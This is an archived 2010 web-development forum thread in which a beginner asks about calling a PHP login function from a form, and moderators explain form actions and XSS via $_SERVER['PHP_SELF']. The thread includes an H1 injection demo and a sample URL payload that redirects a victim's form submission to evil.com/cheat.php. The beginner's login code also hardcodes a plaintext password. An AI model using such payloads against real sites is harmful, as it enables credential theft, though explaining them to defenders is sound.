 Question with <form action= > and PHP |
  |
| hikzero |
 Jan 8 2010, 04:57 PM
Post
#1
|
|
Group: Members Posts: 5 Joined: 6-January 10 Member No.: 10,779  |
Hi. I've decided to make a simple log in script, with PHP since people have said Javascript sucks for security.
I got all of it down except in the part where I the PHP comes in. I have <div class="form_specs"> <table> <td> <form action="check_details()" method="post"> <center>Your name: <input type="text" name="name" size="20" /></center> <br /> <br /> <center>Passcode: <input type="password" name="pass" size="20" /></center> <br /> <br /> <center><input type="submit" value="Log in" /></center> </form> </td> </table> But it won't call the PHP function! I have made the php script within the same html file that code is in. This is my php: CODE <?php function check_details() { $given_pass = $_POST["pass"]; $correct_pass = "sameer"; if ( $given_pass == $correct_pass ) { echo "Correct Password!"; sleep(5); header( 'Location:http://www.swaghelp321.webege.com/personal.html'); } else { echo "Incorrect Password." echo "You will be redirected back to this login in 5 seconds."; sleep(5); header( 'Location:http://www.swaghelp321.webege.com/main_login.html'); } ?> As far as I can tell it's perfect for determining if the password is correct or incorrect. This is my whole file's code. main_login.html CODE <html> <head><title>title here</title> </head> <?php function check_details() { $given_pass = $_POST["pass"]; $correct_pass = "sameer"; if ( $given_pass == $correct_pass ) { echo "Correct Password!"; sleep(5); header( 'Location:http://www.swaghelp321.webege.com/personal.html'); } else { echo "Incorrect Password." echo "You will be redirected back to this login in 5 seconds."; sleep(5); header( 'Location:http://www.swaghelp321.webege.com/main_login.html'); } ?> <style type="text/css"> .form_specs { border: 1px solid black; padding:10px; position:fixed; top:120px; left:500px; width:200px; background-color:orange } </style> <body bgcolor="black"> <div class="form_specs"> <table> <td> <form action="check_details()" method="post"> <center>Your name: <input type="text" name="name" size="20" /></center> <br /> <br /> <center>Passcode: <input type="password" name="pass" size="20" /></center> <br /> <br /> <center><input type="submit" value="Log in" /></center> </form> </td> </table> </body> </html> This post has been edited by hikzero: Jan 8 2010, 04:59 PM |
  |
 
|
| Christian J |
Jan 8 2010, 06:05 PM
Post
#2
|
|
.  Group: WDG Moderators Posts: 9,653 Joined: 10-August 06 Member No.: 7 |
The form's ACTION must point to the file where the script is, like
CODE action="main_login.html" Since in this case both the form and script are in the same file you can simply use an empty ACTION value: CODE action="" BTW, many sites recommend using something like this: CODE action="<?php echo $_SERVER[PHP_SELF];?>" but I don't think that should be necessary. See also http://www.thefutureoftheweb.com/blog/use-...bmit-to-current |
|
|
|
| Brian Chandler |
Jan 9 2010, 02:22 AM
Post
#3
|
|
Jocular coder Group: Members Posts: 2,460 Joined: 31-August 06 Member No.: 43 |
The first thing you have to sort out in your head (grok!) is *where* various things are happening.
Any PHP function can only be called by another bit of PHP program, and all PHP programs run on your server. What the user does on her browser is happening inside her computer; this can include running javascript, jiggling around with what's happening in the browser. For something on the browser to affect what's going on on the server it must send an HTTP request for another document -- typically by using a form. If you make your form correctly call the function which redirects to the desired page if the password matches, this will "work". But it won't prevent anyone simply accessing the page directly; and if it's interesting, someone will mention it on their blog, and lots of people will look. Why do you need a login?? If you really do, it is probably simpler to use HTTP simple authentication [google]. |
|
|
|
| hikzero |
Jan 9 2010, 04:23 AM
Post
#4
|
|
Group: Members Posts: 5 Joined: 6-January 10 Member No.: 10,779 |
I don't want my cousin accessing a certain file on my site
 |
|
|
|
| Christian J |
Jul 6 2010, 06:56 AM
Post
#5
|
|
. Group: WDG Moderators Posts: 9,653 Joined: 10-August 06 Member No.: 7 |
QUOTE(Christian J @ Jan 9 2010, 01:05 AM)  BTW, many sites recommend using something like this: CODE action="<?php echo $_SERVER[PHP_SELF];?>" but I don't think that should be necessary. When using $_SERVER[PHP_SELF] malicious users can insert code into the web page through the query string, unless $_SERVER[PHP_SELF] is properly sanitized. See http://phpsecurity.wordpress.com/2007/11/0...er-of-php_self/ |
|
|
|
| Brian Chandler |
Jul 6 2010, 09:22 AM
Post
#6
|
|
Jocular coder Group: Members Posts: 2,460 Joined: 31-August 06 Member No.: 43 |
QUOTE(Christian J @ Jul 6 2010, 08:56 PM) QUOTE(Christian J @ Jan 9 2010, 01:05 AM) BTW, many sites recommend using something like this: CODE action="<?php echo $_SERVER[PHP_SELF];?>" but I don't think that should be necessary. When using $_SERVER[PHP_SELF] malicious users can insert code into the web page through the query string, unless $_SERVER[PHP_SELF] is properly sanitized. See http://phpsecurity.wordpress.com/2007/11/0...er-of-php_self/ The page you linked to makes no sense. If bits of html can be inserted into a page like this it must be a problem with the (wordpress??) script. For example, my phpinfo page shows the value of PHP_SELF as "/shop/.../phpinfo.php". Well, none of the characters in that string will be changed in the slightest by applying the htmlentities() function. And if the action parameter in the form is "/shop/.../phpinfo.php" (for example), it makes no difference whether this string was typed as a literal, or echoed as the $_SERVER variable. So perhaps there is some problem here, but I think it is not relevant. I think that when I have a page submitting to itself, I have always written the (relative) url in the action=, which seems the most robust way to do it. |
|
|
|
| Christian J |
Jul 7 2010, 01:21 PM
Post
#7
|
|
. Group: WDG Moderators Posts: 9,653 Joined: 10-August 06 Member No.: 7 |
QUOTE(Brian Chandler @ Jul 6 2010, 04:22 PM) The page you linked to makes no sense. If bits of html can be inserted into a page like this it must be a problem with the (wordpress??) script. No it's not wordpress. Here's a small demo: CODE <?php <?php $this_page="example1.html"; echo "<p>Click on the link to create malicious URL</p>\n"; echo "<p><a href=\"$this_page/%3Ch1%3EXSS%3C/h1%3E\">$this_page/%3Ch1%3EXSS%3C/h1%3E </a></p>\n"; echo '<p>Sanitized: '.htmlspecialchars($_SERVER['PHP_SELF'])."</p>\n"; echo '<p>Not sanitized: '.$_SERVER['PHP_SELF']; ?> The above inserts an H1 element with the text "XSS" (you must of course change the value of $this_page to your own test page's name). QUOTE For example, my phpinfo page shows the value of PHP_SELF as "/shop/.../phpinfo.php". You need to append the "malicious" part also. With an URL like this: CODE /phpinfo.php/%3Ch1%3EXSS%3C/h1%3E My offline system return this value for _SERVER["PHP_SELF"] in the browser: /phpinfo.php/<h1>XSS</h1> My web host somehow changes the "<" and ">" characters though, so phpinfo returns this value for _SERVER["PHP_SELF"] in the browser: ?h1?XSS?/h1? This post has been edited by Christian J: Jul 7 2010, 01:53 PM |
|
|
|
| Brian Chandler |
Jul 8 2010, 02:33 PM
Post
#8
|
|
Jocular coder Group: Members Posts: 2,460 Joined: 31-August 06 Member No.: 43 |
Oh, right. Sorry, I was being a bit dim, though it would have helped if the article gave a valid example. What you want to be in the trick URL is
something.com/logonpage.php/"></form><form method=post action="evil.com/cheat.php so the victim's form entry gets sent somewhere else. Anyway, yes, you should always use htmlspecialchars(). |
|
|
|
|
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:
|
Lo-Fi Version | Time is now: 19th April 2024 - 06:01 PM |
Invision Power Board
© 2024 IPS, Inc.
Licensed to: HTMLHelp.com, LLC